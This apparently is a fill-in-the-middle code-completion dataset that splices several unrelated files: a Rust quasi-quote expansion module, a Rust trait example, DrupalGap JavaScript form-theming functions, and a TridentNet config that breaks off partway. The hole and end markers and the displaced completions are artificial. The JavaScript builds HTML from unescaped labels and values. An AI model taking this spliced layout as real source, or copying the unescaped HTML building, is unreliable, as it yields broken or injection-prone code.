r.push(ast::TtDelimited(self.span, Rc::new(ast::Delimited {
delim: token::Bracket,
open_span: self.span,
tts: self.node.value.to_tokens(cx),
close_span: self.span,
})));
r
}
}
impl ToTokens for str {
fn to_tokens(&self, cx: &ExtCtxt) -> Vec<TokenTree> {
let lit = ast::LitStr(
token::intern_and_get_ident(self), ast::CookedStr);
dummy_spanned(lit).to_tokens(cx)
}
}
impl ToTokens for () {
fn to_tokens(&self, _cx: &ExtCtxt) -> Vec<TokenTree> {
vec![ast::TtDelimited(DUMMY_SP, Rc::new(ast::Delimited {
delim: token::Paren,
open_span: DUMMY_SP,
tts: vec![],
close_span: DUMMY_SP,
}))]
}
}
impl ToTokens for ast::Lit {
fn to_tokens(&self, cx: &ExtCtxt) -> Vec<TokenTree> {
// FIXME: This is wrong
P(ast::Expr {
id: ast::DUMMY_NODE_ID,
node: ast::ExprLit(P(self.clone())),
span: DUMMY_SP,
}).to_tokens(cx)
}
}
impl ToTokens for bool {
fn to_tokens(&self, cx: &ExtCtxt) -> Vec<TokenTree> {
dummy_spanned(ast::LitBool(*self)).to_tokens(cx)
}
}
impl ToTokens for char {
fn to_tokens(&self, cx: &ExtCtxt) -> Vec<TokenTree> {
dummy_spanned(ast::LitChar(*self)).to_tokens(cx)
}
}
macro_rules! impl_to_tokens_int {
(signed, $t:ty, $tag:expr) => (
impl ToTokens for $t {
fn to_tokens(&self, cx: &ExtCtxt) -> Vec<TokenTree> {
let lit = ast::LitInt(*self as u64, ast::SignedIntLit($tag,
ast::Sign::new(*self)));
dummy_spanned(lit).to_tokens(cx)
}
}
);
(unsigned, $t:ty, $tag:expr) => (
impl ToTokens for $t {
fn to_tokens(&self, cx: &ExtCtxt) -> Vec<TokenTree> {
let lit = ast::LitInt(*self as u64, ast::UnsignedIntLit($tag));
dummy_spanned(lit).to_tokens(cx)
}
}
);
}
impl_to_tokens_int! { signed, isize, ast::TyIs }
impl_to_tokens_int! { signed, i8, ast::TyI8 }
impl_to_tokens_int! { signed, i16, ast::TyI16 }
impl_to_tokens_int! { signed, i32, ast::TyI32 }
impl_to_tokens_int! { signed, i64, ast::TyI64 }
impl_to_tokens_int! { unsigned, usize, ast::TyUs }
impl_to_tokens_int! { unsigned, u8, ast::TyU8 }
impl_to_tokens_int! { unsigned, u16, ast::TyU16 }
impl_to_tokens_int! { unsigned, u32, ast::TyU32 }
impl_to_tokens_int! { unsigned, u64, ast::TyU64 }
pub trait ExtParseUtils {
fn parse_item(&self, s: String) -> P<ast::Item>;
fn parse_expr(&self, s: String) -> P<ast::Expr>;
fn parse_stmt(&self, s: String) -> P<ast::Stmt>;
fn parse_tts(&self, s: String) -> Vec<ast::TokenTree>;
}
impl<'a> ExtParseUtils for ExtCtxt<'a> {
fn parse_item(&self, s: String) -> P<ast::Item> {
parse::parse_item_from_source_str(
"<quote expansion>".to_string(),
s,
self.cfg(),
self.parse_sess()).expect("parse error")
}
fn parse_stmt(&self, s: String) -> P<ast::Stmt> {
parse::parse_stmt_from_source_str("<quote expansion>".to_string(),
s,
self.cfg(),
self.parse_sess()).expect("parse error")
}
fn parse_expr(&self, s: String) -> P<ast::Expr> {
parse::parse_expr_from_source_str("<quote expansion>".to_string(),
s,
self.cfg(),
self.parse_sess())
}
fn parse_tts(&self, s: String) -> Vec<ast::TokenTree> {
parse::parse_tts_from_source_str("<quote expansion>".to_string(),
s,
self.cfg(),
self.parse_sess())
}
}
}
pub fn expand_quote_tokens<'cx>(cx: &'cx mut ExtCtxt,
sp: Span,
tts: &[ast::TokenTree])
-> Box<base::MacResult+'cx> {
let (cx_expr, expr) = expand_tts(cx, sp, tts);
let expanded = expand_wrapper(cx, sp, cx_expr, expr, &[&["syntax", "ext", "quote", "rt"]]);
base::MacEager::expr(expanded)
}
pub fn expand_quote_expr<'cx>(cx: &'cx mut ExtCtxt,
sp: Span,
tts: &[ast::TokenTree])
-> Box<base::MacResult+'cx> {
let expanded = expand_parse_call(cx, sp, "parse_expr", vec!(), tts);
base::MacEager::expr(expanded)
}
pub fn expand_quote_item<'cx>(cx: &mut ExtCtxt,
sp: Span,
tts: &[ast::TokenTree])
-> Box<base::MacResult+'cx> {
let expanded = expand_parse_call(cx, sp, "parse_item", vec!(), tts);
base::MacEager::expr(expanded)
}
pub fn expand_quote_pat<'cx>(cx: &'cx mut ExtCtxt,
sp: Span,
tts: &[ast::TokenTree])
-> Box<base::MacResult+'cx> {
let expanded = expand_parse_call(cx, sp, "parse_pat", vec!(), tts);
base::MacEager::expr(expanded)
}
pub fn expand_quote_arm(cx: &mut ExtCtxt,
sp: Span,
tts: &[ast::TokenTree])
-> Box<base::MacResult+'static> {
let expanded = expand_parse_call(cx, sp, "parse_arm", vec!(), tts);
base::MacEager::expr(expanded)
}
pub fn expand_quote_ty(cx: &mut ExtCtxt,
sp: Span,
tts: &[ast::TokenTree])
-> Box<base::MacResult+'static> {
let expanded = expand_parse_call(cx, sp, "parse_ty", vec!(), tts);
base::MacEager::expr(expanded)
}
pub fn expand_quote_stmt(cx: &mut ExtCtxt,
sp: Span,
tts: &[ast::TokenTree])
-> Box<base::MacResult+'static> {
let expanded = expand_parse_call(cx, sp, "parse_stmt", vec!(), tts);
base::MacEager::expr(expanded)
}
pub fn expand_quote_attr(cx: &mut ExtCtxt,
sp: Span,
tts: &[ast::TokenTree])
-> Box<base::MacResult+'static> {
let expanded = expand_parse_call(cx, sp, "parse_attribute",
vec!(cx.expr_bool(sp, true)), tts);
base::MacEager::expr(expanded)
}
pub fn expand_quote_matcher(cx: &mut ExtCtxt,
sp: Span,
tts: &[ast::TokenTree])
-> Box<base::MacResult+'static> {
let (cx_expr, tts) = parse_arguments_to_quote(cx, tts);
let mut vector = mk_stmts_let(cx, sp);
vector.extend(statements_mk_tts(cx, &tts[..], true).into_iter());
let block = cx.expr_block(
cx.block_all(sp,
vector,
Some(cx.expr_ident(sp, id_ext("tt")))));
let expanded = expand_wrapper(cx, sp, cx_expr, block, &[&["syntax", "ext", "quote", "rt"]]);
base::MacEager::expr(expanded)
}
fn ids_ext(strs: Vec<String> ) -> Vec<ast::Ident> {
strs.iter().map(|str| str_to_ident(&(*str))).collect()
}
fn id_ext(str: &str) -> ast::Ident {
str_to_ident(str)
}
// Lift an ident to the expr that evaluates to that ident.
fn mk_ident(cx: &ExtCtxt, sp: Span, ident: ast::Ident) -> P<ast::Expr> {
let e_str = cx.expr_str(sp, token::get_ident(ident));
cx.expr_method_call(sp,
cx.expr_ident(sp, id_ext("ext_cx")),
id_ext("ident_of"),
vec!(e_str))
}
// Lift a name to the expr that evaluates to that name
fn mk_name(cx: &ExtCtxt, sp: Span, ident: ast::Ident) -> P<ast::Expr> {
let e_str = cx.expr_str(sp, token::get_ident(ident));
cx.expr_method_call(sp,
cx.expr_ident(sp, id_ext("ext_cx")),
id_ext("name_of"),
vec!(e_str))
}
fn mk_ast_path(cx: &ExtCtxt, sp: Span, name: &str) -> P<ast::Expr> {
let idents = vec!(id_ext("syntax"), id_ext("ast"), id_ext(name));
cx.expr_path(cx.path_global(sp, idents))
}
fn mk_token_path(cx: &ExtCtxt, sp: Span, name: &str) -> P<ast::Expr> {
let idents = vec!(id_ext("syntax"), id_ext("parse"), id_ext("token"), id_ext(name));
cx.expr_path(cx.path_global(sp, idents))
}
fn mk_binop(cx: &ExtCtxt, sp: Span, bop: token::BinOpToken) -> P<ast::Expr> {
let name = match bop {
token::Plus => "Plus",
token::Minus => "Minus",
token::Star => "Star",
token::Slash => "Slash",
token::Percent => "Percent",
token::Caret => "Caret",
token::And => "And",
token::Or => "Or",
token::Shl => "Shl",
token::Shr => "Shr"
};
mk_token_path(cx, sp, name)
}
fn mk_delim(cx: &ExtCtxt, sp: Span, delim: token::DelimToken) -> P<ast::Expr> {
let name = match delim {
token::Paren => "Paren",
token::Bracket => "Bracket",
token::Brace => "Brace",
};
mk_token_path(cx, sp, name)
}
#[allow(non_upper_case_globals)]
fn expr_mk_token(cx: &ExtCtxt, sp: Span, tok: &token::Token) -> P<ast::Expr> {
macro_rules! mk_lit {
($name: expr, $suffix: expr, $($args: expr),*) => {{
let inner = cx.expr_call(sp, mk_token_path(cx, sp, $name), vec![$($args),*]);
let suffix = match $suffix {
Some(name) => cx.expr_some(sp, mk_name(cx, sp, ast::Ident::new(name))),
None => cx.expr_none(sp)
};
cx.expr_call(sp, mk_token_path(cx, sp, "Literal"), vec![inner, suffix])
}}
}
match *tok {
token::BinOp(binop) => {
return cx.expr_call(sp, mk_token_path(cx, sp, "BinOp"), vec!(mk_binop(cx, sp, binop)));
}
token::BinOpEq(binop) => {
return cx.expr_call(sp, mk_token_path(cx, sp, "BinOpEq"),
vec!(mk_binop(cx, sp, binop)));
}
token::OpenDelim(delim) => {
return cx.expr_call(sp, mk_token_path(cx, sp, "OpenDelim"),
vec![mk_delim(cx, sp, delim)]);
}
token::CloseDelim(delim) => {
return cx.expr_call(sp, mk_token_path(cx, sp, "CloseDelim"),
vec![mk_delim(cx, sp, delim)]);
}
token::Literal(token::Byte(i), suf) => {
let e_byte = mk_name(cx, sp, i.ident());
return mk_lit!("Byte", suf, e_byte);
}
token::Literal(token::Char(i), suf) => {
let e_char = mk_name(cx, sp, i.ident());
return mk_lit!("Char", suf, e_char);
}
token::Literal(token::Integer(i), suf) => {
let e_int = mk_name(cx, sp, i.ident());
return mk_lit!("Integer", suf, e_int);
}
token::Literal(token::Float(fident), suf) => {
let e_fident = mk_name(cx, sp, fident.ident());
return mk_lit!("Float", suf, e_fident);
}
token::Literal(token::Str_(ident), suf) => {
return mk_lit!("Str_", suf, mk_name(cx, sp, ident.ident()))
}
token::Literal(token::StrRaw(ident, n), suf) => {
return mk_lit!("StrRaw", suf, mk_name(cx, sp, ident.ident()), cx.expr_usize(sp, n))
}
token::Ident(ident, style) => {
return cx.expr_call(sp,
mk_token_path(cx, sp, "Ident"),
vec![mk_ident(cx, sp, ident),
match style {
ModName => mk_token_path(cx, sp, "ModName"),
Plain => mk_token_path(cx, sp, "Plain"),
}]);
}
token::Lifetime(ident) => {
return cx.expr_call(sp,
mk_token_path(cx, sp, "Lifetime"),
vec!(mk_ident(cx, sp, ident)));
}
token::DocComment(ident) => {
return cx.expr_call(sp,
mk_token_path(cx, sp, "DocComment"),
vec!(mk_name(cx, sp, ident.ident())));
}
token::MatchNt(name, kind, namep, kindp) => {
return cx.expr_call(sp,
mk_token_path(cx, sp, "MatchNt"),
vec!(mk_ident(cx, sp, name),
mk_ident(cx, sp, kind),
match namep {
ModName => mk_token_path(cx, sp, "ModName"),
Plain => mk_token_path(cx, sp, "Plain"),
},
match kindp {
ModName => mk_token_path(cx, sp, "ModName"),
Plain => mk_token_path(cx, sp, "Plain"),
}));
}
token::Interpolated(_) => panic!("quote! with interpolated token"),
_ => ()
}
let name = match *tok {
token::Eq => "Eq",
token::Lt => "Lt",
token::Le => "Le",
token::EqEq => "EqEq",
token::Ne => "Ne",
token::Ge => "Ge",
token::Gt => "Gt",
token::AndAnd => "AndAnd",
token::OrOr => "OrOr",
token::Not => "Not",
token::Tilde => "Tilde",
token::At => "At",
token::Dot => "Dot",
token::DotDot => "DotDot",
token::Comma => "Comma",
token::Semi => "Semi",
token::Colon => "Colon",
token::ModSep => "ModSep",
token::RArrow => "RArrow",
token::LArrow => "LArrow",
token::FatArrow => "FatArrow",
token::Pound => "Pound",
token::Dollar => "Dollar",
token::Question => "Question",
token::Underscore => "Underscore",
token::Eof => "Eof",
_ => panic!("unhandled token in quote!"),
};
mk_token_path(cx, sp, name)
}
fn statements_mk_tt(cx: &ExtCtxt, tt: &ast::TokenTree, matcher: bool) -> Vec<P<ast::Stmt>> {
match *tt {
ast::TtToken(sp, SubstNt(ident, _)) => {
// tt.extend($ident.to_tokens(ext_cx).into_iter())
let e_to_toks =
cx.expr_method_call(sp,
cx.expr_ident(sp, ident),
id_ext("to_tokens"),
vec!(cx.expr_ident(sp, id_ext("ext_cx"))));
let e_to_toks =
cx.expr_method_call(sp, e_to_toks, id_ext("into_iter"), vec![]);
let e_push =
cx.expr_method_call(sp,
cx.expr_ident(sp, id_ext("tt")),
id_ext("extend"),
vec!(e_to_toks));
vec!(cx.stmt_expr(e_push))
}
ref tt @ ast::TtToken(_, MatchNt(..)) if !matcher => {
let mut seq = vec![];
for i in 0..tt.len() {
seq.push(tt.get_tt(i));
}
statements_mk_tts(cx, &seq[..], matcher)
}
ast::TtToken(sp, ref tok) => {
let e_sp = cx.expr_ident(sp, id_ext("_sp"));
let e_tok = cx.expr_call(sp,
mk_ast_path(cx, sp, "TtToken"),
vec!(e_sp, expr_mk_token(cx, sp, tok)));
let e_push =
cx.expr_method_call(sp,
cx.expr_ident(sp, id_ext("tt")),
id_ext("push"),
vec!(e_tok));
vec!(cx.stmt_expr(e_push))
},
ast::TtDelimited(_, ref delimed) => {
statements_mk_tt(cx, &delimed.open_tt(), matcher).into_iter()
.chain(delimed.tts.iter()
.flat_map(|tt| statements_mk_tt(cx, tt, matcher).into_iter()))
.chain(statements_mk_tt(cx, &delimed.close_tt(), matcher).into_iter())
.collect()
},
ast::TtSequence(sp, ref seq) => {
if !matcher {
panic!("TtSequence in quote!");
}
let e_sp = cx.expr_ident(sp, id_ext("_sp"));
let stmt_let_tt = cx.stmt_let(sp, true, id_ext("tt"), cx.expr_vec_ng(sp));
let mut tts_stmts = vec![stmt_let_tt];
tts_stmts.extend(statements_mk_tts(cx, &seq.tts[..], matcher).into_iter());
let e_tts = cx.expr_block(cx.block(sp, tts_stmts,
Some(cx.expr_ident(sp, id_ext("tt")))));
let e_separator = match seq.separator {
Some(ref sep) => cx.expr_some(sp, expr_mk_token(cx, sp, sep)),
None => cx.expr_none(sp),
};
let e_op = match seq.op {
ast::ZeroOrMore => mk_ast_path(cx, sp, "ZeroOrMore"),
ast::OneOrMore => mk_ast_path(cx, sp, "OneOrMore"),
};
let fields = vec![cx.field_imm(sp, id_ext("tts"), e_tts),
cx.field_imm(sp, id_ext("separator"), e_separator),
cx.field_imm(sp, id_ext("op"), e_op),
cx.field_imm(sp, id_ext("num_captures"),
cx.expr_usize(sp, seq.num_captures))];
let seq_path = vec![id_ext("syntax"), id_ext("ast"), id_ext("SequenceRepetition")];
let e_seq_struct = cx.expr_struct(sp, cx.path_global(sp, seq_path), fields);
let e_rc_new = cx.expr_call_global(sp, vec![id_ext("std"),
id_ext("rc"),
id_ext("Rc"),
id_ext("new")],
vec![e_seq_struct]);
let e_tok = cx.expr_call(sp,
mk_ast_path(cx, sp, "TtSequence"),
vec!(e_sp, e_rc_new));
let e_push =
cx.expr_method_call(sp,
cx.expr_ident(sp, id_ext("tt")),
id_ext("push"),
vec!(e_tok));
vec!(cx.stmt_expr(e_push))
}
}
}
fn parse_arguments_to_quote(cx: &ExtCtxt, tts: &[ast::TokenTree])
-> (P<ast::Expr>, Vec<ast::TokenTree>) {
// NB: It appears that the main parser loses its mind if we consider
// $foo as a SubstNt during the main parse, so we have to re-parse
// under quote_depth > 0. This is silly and should go away; the _guess_ is
// it has to do with transition away from supporting old-style macros, so
// try removing it when enough of them are gone.
let mut p = cx.new_parser_from_tts(tts);
p.quote_depth += 1;
let cx_expr = p.parse_expr();
if !panictry!(p.eat(&token::Comma)) {
panic!(p.fatal("expected token `,`"));
}
let tts = panictry!(p.parse_all_token_trees());
p.abort_if_errors();
(cx_expr, tts)
}
fn mk_stmts_let(cx: &ExtCtxt, sp: Span) -> Vec<P<ast::Stmt>> {
// We also bind a single value, sp, to ext_cx.call_site()
//
// This causes every span in a token-tree quote to be attributed to the
// call site of the extension using the quote. We can't really do much
// better since the source of the quote may well be in a library that
// was not even parsed by this compilation run, that the user has no
// source code for (eg. in libsyntax, which they're just _using_).
//
// The old quasiquoter had an elaborate mechanism for denoting input
// file locations from which quotes originated; unfortunately this
// relied on feeding the source string of the quote back into the
// compiler (which we don't really want to do) and, in any case, only
// pushed the problem a very small step further back: an error
// resulting from a parse of the resulting quote is still attributed to
// the site the string literal occurred, which was in a source file
// _other_ than the one the user has control over. For example, an
// error in a quote from the protocol compiler, invoked in user code
// using macro_rules! for example, will be attributed to the macro_rules.rs
// file in libsyntax, which the user might not even have source to (unless
// they happen to have a compiler on hand). Over all, the phase distinction
// just makes quotes "hard to attribute". Possibly this could be fixed
// by recreating some of the original qq machinery in the tt regime
// (pushing fake FileMaps onto the parser to account for original sites
// of quotes, for example) but at this point it seems not likely to be
// worth the hassle.
let e_sp = cx.expr_method_call(sp,
cx.expr_ident(sp, id_ext("ext_cx")),
id_ext("call_site"),
Vec::new());
let stmt_let_sp = cx.stmt_let(sp, false,
id_ext("_sp"),
e_sp);<|fim▁hole|>
vec!(stmt_let_sp, stmt_let_tt)
}
fn statements_mk_tts(cx: &ExtCtxt, tts: &[ast::TokenTree], matcher: bool) -> Vec<P<ast::Stmt>> {
let mut ss = Vec::new();
for tt in tts {
ss.extend(statements_mk_tt(cx, tt, matcher).into_iter());
}
ss
}
fn expand_tts(cx: &ExtCtxt, sp: Span, tts: &[ast::TokenTree])
-> (P<ast::Expr>, P<ast::Expr>) {
let (cx_expr, tts) = parse_arguments_to_quote(cx, tts);
let mut vector = mk_stmts_let(cx, sp);
vector.extend(statements_mk_tts(cx, &tts[..], false).into_iter());
let block = cx.expr_block(
cx.block_all(sp,
vector,
Some(cx.expr_ident(sp, id_ext("tt")))));
(cx_expr, block)
}
fn expand_wrapper(cx: &ExtCtxt,
sp: Span,
cx_expr: P<ast::Expr>,
expr: P<ast::Expr>,
imports: &[&[&str]]) -> P<ast::Expr> {
// Explicitly borrow to avoid moving from the invoker (#16992)
let cx_expr_borrow = cx.expr_addr_of(sp, cx.expr_deref(sp, cx_expr));
let stmt_let_ext_cx = cx.stmt_let(sp, false, id_ext("ext_cx"), cx_expr_borrow);
let stmts = imports.iter().map(|path| {
// make item: `use ...;`
let path = path.iter().map(|s| s.to_string()).collect();
cx.stmt_item(sp, cx.item_use_glob(sp, ast::Inherited, ids_ext(path)))
}).chain(Some(stmt_let_ext_cx).into_iter()).collect();
cx.expr_block(cx.block_all(sp, stmts, Some(expr)))
}
fn expand_parse_call(cx: &ExtCtxt,
sp: Span,
parse_method: &str,
arg_exprs: Vec<P<ast::Expr>> ,
tts: &[ast::TokenTree]) -> P<ast::Expr> {
let (cx_expr, tts_expr) = expand_tts(cx, sp, tts);
let cfg_call = || cx.expr_method_call(
sp, cx.expr_ident(sp, id_ext("ext_cx")),
id_ext("cfg"), Vec::new());
let parse_sess_call = || cx.expr_method_call(
sp, cx.expr_ident(sp, id_ext("ext_cx")),
id_ext("parse_sess"), Vec::new());
let new_parser_call =
cx.expr_call(sp,
cx.expr_ident(sp, id_ext("new_parser_from_tts")),
vec!(parse_sess_call(), cfg_call(), tts_expr));
let expr = cx.expr_method_call(sp, new_parser_call, id_ext(parse_method),
arg_exprs);
if parse_method == "parse_attribute" {
expand_wrapper(cx, sp, cx_expr, expr, &[&["syntax", "ext", "quote", "rt"],
&["syntax", "parse", "attr"]])
} else {
expand_wrapper(cx, sp, cx_expr, expr, &[&["syntax", "ext", "quote", "rt"]])
}
}<|fim▁end|> |
let stmt_let_tt = cx.stmt_let(sp, true, id_ext("tt"), cx.expr_vec_ng(sp)); |
<|file_name|>main.rs<|end_file_name|><|fim▁begin|>use std::fmt;
trait OutlinePrint: fmt::Display {
fn outline_print(&self) {
let output = self.to_string();
let len = output.len();
println!("{}", "*".repeat(len + 4));
println!("*{}*", " ".repeat(len + 2));
println!("* {} *", output);
println!("*{}*", " ".repeat(len + 2));
println!("{}", "*".repeat(len + 4));
}
}
// ANCHOR: here
struct Point {
x: i32,
y: i32,
}
impl OutlinePrint for Point {}
// ANCHOR_END: here
fn main() {
let p = Point { x: 1, y: 3 };
p.outline_print();<|fim▁hole|><|fim▁end|> | } |
<|file_name|>form.theme.inc.js<|end_file_name|><|fim▁begin|>/**
* Themes a checkbox input.
* @param {Object} variables
* @return {String}
*/<|fim▁hole|> if (variables.checked) {
variables.attributes.checked = 'checked';
}
var output = '<input ' + drupalgap_attributes(variables.attributes) + ' />';
return output;
}
catch (error) { console.log('theme_checkbox - ' + error); }
}
/**
* Themes checkboxes input.
* @param {Object} variables
* @return {String}
*/
function theme_checkboxes(variables) {
try {
var html = '';
variables.attributes.type = 'checkboxes';
for (var value in variables.options) {
if (!variables.options.hasOwnProperty(value)) { continue; }
var label = variables.options[value];
if (value == 'attributes') { continue; } // Skip attributes.
var _label = value;
if (!empty(label)) { _label = label; }
var checkbox = {
value: value,
attributes: {
name: variables.name + '[' + value + ']',
'class': variables.name,
value: value
}
};
if (variables.value && variables.value[value]) {
checkbox.checked = true;
}
html += '<label>' +
theme('checkbox', checkbox) + ' ' + label +
'</label>';
}
// Check the box?
/*if (variables.checked) {
variables.attributes.checked = 'checked';
}*/
return html;
}
catch (error) { console.log('theme_checkbox - ' + error); }
}
/**
* Themes a email input.
* @param {Object} variables
* @return {String}
*/
function theme_email(variables) {
try {
variables.attributes.type = 'email';
var output = '<input ' + drupalgap_attributes(variables.attributes) + ' />';
return output;
}
catch (error) { console.log('theme_email - ' + error); }
}
/**
* Themes a file input.
* @param {Object} variables
* @return {String}
*/
function theme_file(variables) {
try {
variables.attributes.type = 'file';
var output = '<input ' + drupalgap_attributes(variables.attributes) + ' />';
return output;
}
catch (error) { console.log('theme_file - ' + error); }
}
/**
* Themes a form element label.
* @param {Object} variables
* @return {String}
*/
function theme_form_element_label(variables) {
try {
var element = variables.element;
if (empty(element.title)) { return ''; }
// Any elements with a title_placeholder set to true
// By default, use the element id as the label for, unless the element is
// a radio, then use the name.
var label_for = '';
if (element.id) { label_for = element.id; }
else if (element.attributes && element.attributes['for']) {
label_for = element.attributes['for'];
}
if (element.type == 'radios') { label_for = element.name; }
// Render the label.
var html =
'<label for="' + label_for + '"><strong>' + element.title + '</strong>';
if (element.required) { html += theme('form_required_marker', { }); }
html += '</label>';
return html;
}
catch (error) { console.log('theme_form_element_label - ' + error); }
}
/**
* Themes a marker for a required form element label.
* @param {Object} variables
* @return {String}
*/
function theme_form_required_marker(variables) {
return '*';
}
/**
* Themes a number input.
* @param {Object} variables
* @return {String}
*/
function theme_number(variables) {
try {
variables.attributes.type = 'number';
var output = '<input ' + drupalgap_attributes(variables.attributes) + ' />';
return output;
}
catch (error) { console.log('theme_number - ' + error); }
}
/**
* Themes a hidden input.
* @param {Object} variables
* @return {String}
*/
function theme_hidden(variables) {
try {
variables.attributes.type = 'hidden';
if (!variables.attributes.value && variables.value != null) {
variables.attributes.value = variables.value;
}
var output = '<input ' + drupalgap_attributes(variables.attributes) + ' />';
return output;
}
catch (error) { console.log('theme_hidden - ' + error); }
}
/**
* Themes a password input.
* @param {Object} variables
* @return {String}
*/
function theme_password(variables) {
try {
variables.attributes.type = 'password';
var output = '<input ' + drupalgap_attributes(variables.attributes) + ' />';
return output;
}
catch (error) { console.log('theme_password - ' + error); }
}
/**
* Themes radio buttons.
* @param {Object} variables
* @return {String}
*/
function theme_radios(variables) {
try {
var radios = '';
if (variables.options) {
variables.attributes.type = 'radio';
// Determine an id prefix to use.
var id = 'radio';
if (variables.attributes.id) {
id = variables.attributes.id;
delete variables.attributes.id;
}
// Set the radio name equal to the id if one doesn't exist.
if (!variables.attributes.name) {
variables.attributes.name = id;
}
// Init a delta value so each radio button can have a unique id.
var delta = 0;
for (var value in variables.options) {
if (!variables.options.hasOwnProperty(value)) { continue; }
var label = variables.options[value];
if (value == 'attributes') { continue; } // Skip the attributes.
var checked = '';
if (variables.value && variables.value == value) {
checked = ' checked="checked" ';
}
var input_id = id + '_' + delta.toString();
var input_label =
'<label for="' + input_id + '">' + label + '</label>';
radios += '<input id="' + input_id + '" value="' + value + '" ' +
drupalgap_attributes(variables.attributes) +
checked + ' />' + input_label;
delta++;
}
}
return radios;
}
catch (error) { console.log('theme_radios - ' + error); }
}
/**
* Themes a range input.
* @param {Object} variables
* @return {String}
*/
function theme_range(variables) {
try {
variables.attributes.type = 'range';
if (typeof variables.attributes.value === 'undefined') {
variables.attributes.value = variables.value;
}
var output = '<input ' + drupalgap_attributes(variables.attributes) + ' />';
return output;
}
catch (error) { console.log('theme_range - ' + error); }
}
/**
* Themes a search input.
* @param {Object} variables
* @return {String}
*/
function theme_search(variables) {
try {
variables.attributes.type = 'search';
var output = '<input ' + drupalgap_attributes(variables.attributes) + ' />';
return output;
}
catch (error) { console.log('theme_search - ' + error); }
}
/**
* Themes a select list input.
* @param {Object} variables
* @return {String}
*/
function theme_select(variables) {
try {
var options = '';
if (variables.options) {
for (var value in variables.options) {
if (!variables.options.hasOwnProperty(value)) { continue; }
var label = variables.options[value];
if (value == 'attributes') { continue; } // Skip the attributes.
// Is the option selected?
var selected = '';
if (typeof variables.value !== 'undefined') {
if (
($.isArray(variables.value) && in_array(value, variables.value)) ||
variables.value == value
) { selected = ' selected '; }
}
// Render the option.
options += '<option value="' + value + '" ' + selected + '>' +
label +
'</option>';
}
}
return '<select ' + drupalgap_attributes(variables.attributes) + '>' +
options +
'</select>';
}
catch (error) { console.log('theme_select - ' + error); }
}
/**
* Themes a telephone input.
* @param {Object} variables
* @return {String}
*/
function theme_tel(variables) {
try {
variables.attributes['type'] = 'tel';
var output = '<input ' + drupalgap_attributes(variables.attributes) + ' />';
return output;
}
catch (error) { console.log('theme_tel - ' + error); }
}
/**
* Themes a text input.
* @param {Object} variables
* @return {String}
*/
function theme_textfield(variables) {
try {
variables.attributes.type = 'text';
var output = '<input ' + drupalgap_attributes(variables.attributes) + ' />';
return output;
}
catch (error) { console.log('theme_textfield - ' + error); }
}
/**
* Themes a textarea input.
* @param {Object} variables
* @return {String}
*/
function theme_textarea(variables) {
try {
var output =
'<div><textarea ' + drupalgap_attributes(variables.attributes) + '>' +
variables.value +
'</textarea></div>';
return output;
}
catch (error) { console.log('theme_textarea - ' + error); }
}<|fim▁end|> | function theme_checkbox(variables) {
try {
variables.attributes.type = 'checkbox';
// Check the box? |
<|file_name|>tridentnet_r152v1bc4_c5_2x.py<|end_file_name|><|fim▁begin|>from models.tridentnet.builder import TridentFasterRcnn as Detector
from models.tridentnet.builder_v2 import TridentResNetV1bC4 as Backbone
from models.tridentnet.builder import TridentRpnHead as RpnHead
from models.tridentnet.builder import process_branch_outputs, process_branch_rpn_outputs
from symbol.builder import Neck
from symbol.builder import RoiAlign as RoiExtractor
from symbol.builder import BboxC5V1Head as BboxHead
from mxnext.complicate import normalizer_factory
def get_config(is_train):
class General:
log_frequency = 10
name = __name__.rsplit("/")[-1].rsplit(".")[-1]
batch_image = 1 if is_train else 1
fp16 = False
class Trident:
num_branch = 3
train_scaleaware = True
test_scaleaware = True
branch_ids = range(num_branch)
branch_dilates = [1, 2, 3]
valid_ranges = [(0, 90), (30, 160), (90, -1)]
valid_ranges_on_origin = True
branch_bn_shared = True
branch_conv_shared = True
branch_deform = False
assert num_branch == len(branch_ids)
assert num_branch == len(valid_ranges)
class KvstoreParam:
kvstore = "local"
batch_image = General.batch_image
gpus = [0, 1, 2, 3, 4, 5, 6, 7]
fp16 = General.fp16
class NormalizeParam:
# normalizer = normalizer_factory(type="syncbn", ndev=len(KvstoreParam.gpus))
normalizer = normalizer_factory(type="fixbn")
class BackboneParam:
fp16 = General.fp16
normalizer = NormalizeParam.normalizer
depth = 152
num_branch = Trident.num_branch
branch_ids = Trident.branch_ids
branch_dilates = Trident.branch_dilates
branch_bn_shared = Trident.branch_bn_shared
branch_conv_shared = Trident.branch_conv_shared
branch_deform = Trident.branch_deform
class NeckParam:
fp16 = General.fp16
normalizer = NormalizeParam.normalizer
class RpnParam:
fp16 = General.fp16
normalizer = NormalizeParam.normalizer
batch_image = General.batch_image * Trident.num_branch
class anchor_generate:
scale = (2, 4, 8, 16, 32)
ratio = (0.5, 1.0, 2.0)
stride = 16
image_anchor = 256
class head:
conv_channel = 512
mean = (0, 0, 0, 0)
std = (1, 1, 1, 1)
class proposal:
pre_nms_top_n = 12000 if is_train else 6000
post_nms_top_n = 500 if is_train else 300
nms_thr = 0.7
min_bbox_side = 0
class subsample_proposal:
proposal_wo_gt = True
image_roi = 128
fg_fraction = 0.5
fg_thr = 0.5
bg_thr_hi = 0.5
bg_thr_lo = 0.0
class bbox_target:
num_reg_class = 2
class_agnostic = True
weight = (1.0, 1.0, 1.0, 1.0)
mean = (0.0, 0.0, 0.0, 0.0)
std = (0.1, 0.1, 0.2, 0.2)
class BboxParam:
fp16 = General.fp16
normalizer = NormalizeParam.normalizer
num_class = 1 + 80
image_roi = 128
batch_image = General.batch_image * Trident.num_branch
class regress_target:
class_agnostic = True
mean = (0.0, 0.0, 0.0, 0.0)
std = (0.1, 0.1, 0.2, 0.2)
class RoiParam:
fp16 = General.fp16
normalizer = NormalizeParam.normalizer
out_size = 7
stride = 16
class DatasetParam:
if is_train:
image_set = ("coco_train2017", )
else:
image_set = ("coco_val2017", )
backbone = Backbone(BackboneParam)
neck = Neck(NeckParam)
rpn_head = RpnHead(RpnParam)
roi_extractor = RoiExtractor(RoiParam)
bbox_head = BboxHead(BboxParam)
detector = Detector()
if is_train:
train_sym = detector.get_train_symbol(
backbone, neck, rpn_head, roi_extractor, bbox_head,
num_branch=Trident.num_branch, scaleaware=Trident.train_scaleaware)
rpn_test_sym = None
test_sym = None
else:
train_sym = None
rpn_test_sym = detector.get_rpn_test_symbol(backbone, neck, rpn_head, Trident.num_branch)
test_sym = detector.get_test_symbol(
backbone, neck, rpn_head, roi_extractor, bbox_head, num_branch=Trident.num_branch)
class ModelParam:
train_symbol = train_sym
test_symbol = test_sym
rpn_test_symbol = rpn_test_sym
from_scratch = False
random = True
memonger = False
memonger_until = "stage3_unit21_plus"
class pretrain:
